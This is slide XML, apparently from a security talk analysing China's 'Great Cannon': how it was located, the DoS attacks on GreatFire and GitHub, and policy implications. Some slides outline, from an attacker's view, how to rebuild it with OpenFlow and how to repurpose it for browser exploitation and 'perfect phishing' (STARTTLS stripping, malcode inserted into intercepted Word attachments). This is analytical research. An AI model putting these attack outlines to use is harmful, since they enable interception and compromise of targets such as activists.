            <a:endParaRPr b="0" lang="en-US" sz="5000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="785880" indent="-783360">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="21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Tracerouted to two intercepted targets on different paths</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="66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One in China Telecom, the other in China Unacom</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1174680" indent="-791280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="14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5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Both targets intercepted by the Cannon in the same location as the Firewall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1" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="1412" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="1413" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1414" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14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9" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1420" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold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3" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1424" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14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fill="hold"/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7" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1428" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14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fill="hold"/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1" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/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5" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/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Operational History: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LBNL Time Machine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38720" indent="-73620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Examine Lawrence Berkeley National Lab's Time Machine for the odd-TTL signature:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="621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LBNL does a bulk record start of all connections</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4700" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="738720" indent="-73620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Initial attack: Targeting GreatFire's "collateral freedom" domains</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="621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Unpacked payload, showed evidence of hand-typing (a 0 vs o typo fixed)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="470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Near the end, GreatFire placed a 302 redirect on their domains to www.cac.gov.cn, </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4700" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1455120" indent="-736200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="7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1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Makes the DOS target the Cyber Administration of China!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4140" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="738720" indent="-736200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="18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2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Second attack: the GitHub targeting</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6210" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1104120" indent="-74376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Packed payload, but same basic script</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4700" spc="-1" strike="noStrike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9" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="14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Build It Yourself With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OpenFlow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with an OpenFlow capable switch or router</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6340" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p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Default rule:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="634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Divert all non-empty packets where dst=target and dport=80</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p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Analysis engine:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="634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Examine single packet to make exploitation decision</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="480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no-exploit: Forward packet, whitelist flow</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="480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exploit: Inject reply, whitelist flow</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="754200" indent="-75168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3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Matches observed stateless and flow-cache behavior</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6340" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1127880" indent="-7596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Other alternative of “BGP-advertise target IP” would probably create a traceroute anomaly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435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41" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="1442" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="1443" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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9" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1450" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14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3" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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7" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1458" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14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0" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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1" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1462" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14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fill="hold"/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5" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/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9" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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fill="hold"/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fill="hold"/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7" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1478" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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Modifying The Cannon For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"Pwn By IP" targeting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37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Cannon is good for a lot more than DDoSing GitHub...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nation-state MitM is a very powerful attack tool...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Change criteria slightly: select traffic FROM targeted IP rather than to IP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Need to identify your target's IP address in some other means</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4250" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1315800" indent="-665280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="7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7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Emails from your target, "benign" fishing emails, public data, etc...</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="374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Expand the range of target scripts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"Looks like JavaScript" in the fetch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Reply with "attack the browser" payload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Open an iframe pointing to an exploit server with your nice Flash 0-day...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This change would take less than 1 day to implement</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5610" spc="-1" strike="noStrike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81" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="1482" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="1483" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1484" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14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fill="hold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9" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1490" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14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3" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1494" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold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7" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1498" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14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fill="hold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1" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1502" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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fill="hold"/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5" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1506" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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8" fill="hold"/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9" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1510" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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3" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1514" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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7" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1518" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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1" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1522" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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Modify For "Perfect Phishing" Malicious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Email from China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Identify your target's mail server</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="53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dig +mx theguyIwanttohack.com</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4050" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p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Intercept all traffic to your target's mail server</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="53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Redirect to a man-in-the-middle sink server that intercepts the email</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4050" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1253880" indent="-6339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5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Able to strip STARTTLS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3570" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1253880" indent="-633960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="6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57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Can't tamper with DKIM, but who validates DKIM?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="357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Any word documents to your target?  Modify to include malcode</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="40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Then just send/receive from the cannon to forward the message on to the final server</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4050" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p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Really good for targeting activists and others who communicate with Chinese sources</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5350" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="951480" indent="-64044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0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phishing .doc email is indistinguishable from a legitimate email to a human!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4050" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="636480" indent="-63396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3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Could take 1 week to implement</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5350" spc="-1" strike="noStrike"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25" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="1526" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="1527" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1528" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15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3" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite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7" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1538" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15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fill="hold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4" fill="hold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5" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1546" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15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8" fill="hold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9" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1550" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15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fill="hold"/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3" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1554" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15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6" fill="hold"/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7" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1558" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15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fill="hold"/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1" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1562" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15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fill="hold"/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5" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1566" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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8" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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9" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1570" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15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2" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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Yet good part of NSA Tech Is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Off-the-shelf...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550440" y="3178800"/>
            <a:ext cx="1129500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91560" indent="-68904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8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Nothing as cool as The Great Seal bug</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5810" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1033920" indent="-69588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AKA "The Thing"</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="691560" indent="-68904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8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Instead, its mostly off-the-shelf concepts</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5810" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1033920" indent="-69588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Scalable NIDS &amp; Databases</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1033920" indent="-69588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Hadoop</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1033920" indent="-69588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Malicious code</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1033920" indent="-695880">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199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Cool little hardware pieces</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="691560" indent="-689040">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="18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8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Combined with More Money than God</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="5810" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>™ ~$10 billion</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5810" spc="-1" strike="noStrike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1846880" y="3681720"/>
            <a:ext cx="12520080" cy="937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Serious Policy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Implications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43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China believes they are justified in attacking those who attack the Great Firewall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Both DoS attacks targeted GreatFire's "Collateral Freedom" strategy of hosting counter-censorship material on "too critical to block" encrypted services</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4250" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="667800" indent="-665280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="17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Baidu was probably a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1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bigger</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="56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victim than GreatFire</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="561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 and Github mitigated the attack</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4250" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1315800" indent="-665280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="7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7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GreatFire: Collateral Freedom services now block non-Chinese access, in addition to the DOS-redirection strategy</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3740" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1315800" indent="-665280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700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37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GitHub: Targeted pages won't load unless you visit some other page first</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3740" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="998640" indent="-672120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100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25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Baidu services (and all unencrypted Chinese webservices) get less trusted outside of China</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4250" spc="-1" strike="noStrike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73" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="1574" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst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3" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1584" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15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6" fill="hold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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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2" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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Conclusion: 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China’s Toys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550440" y="3178800"/>
            <a:ext cx="1636884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770040" indent="-7675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46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China joined the "Lets weaponize the Internet" club</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6469" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1151280" indent="-77544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Direct exploit-from-the-network technology</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4900" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="770040" indent="-767520">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="20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646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they kept it running</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="6469" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1151280" indent="-77544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Perhaps because they didn't realize we could map it...</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4900" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1516680" indent="-76752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3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Chinese internal denial subsequently got censored within China!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4310" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1151280" indent="-77544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4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Perhaps because they wanted us to map it!</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4900" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1516680" indent="-767520">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="7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3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They didn't need to use a man-in-the-middle for this attack:</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="43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4310" spc="-1" strike="noStrike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23802480" y="13098960"/>
            <a:ext cx="45792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Image" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="17149680" y="3390840"/>
            <a:ext cx="7107120" cy="10007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95" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="1596" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="1597" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1598" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15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2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6" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1607" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16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fill="hold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0" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1611" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16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fill="hold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4" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="161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6" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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7" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="1618" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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1" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="162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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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4" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="162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But They Use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Slightly Different Language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550440" y="3178800"/>
            <a:ext cx="23334120" cy="1000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Selector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piece of information that identifies what you are looking for</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="990720" indent="-500400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
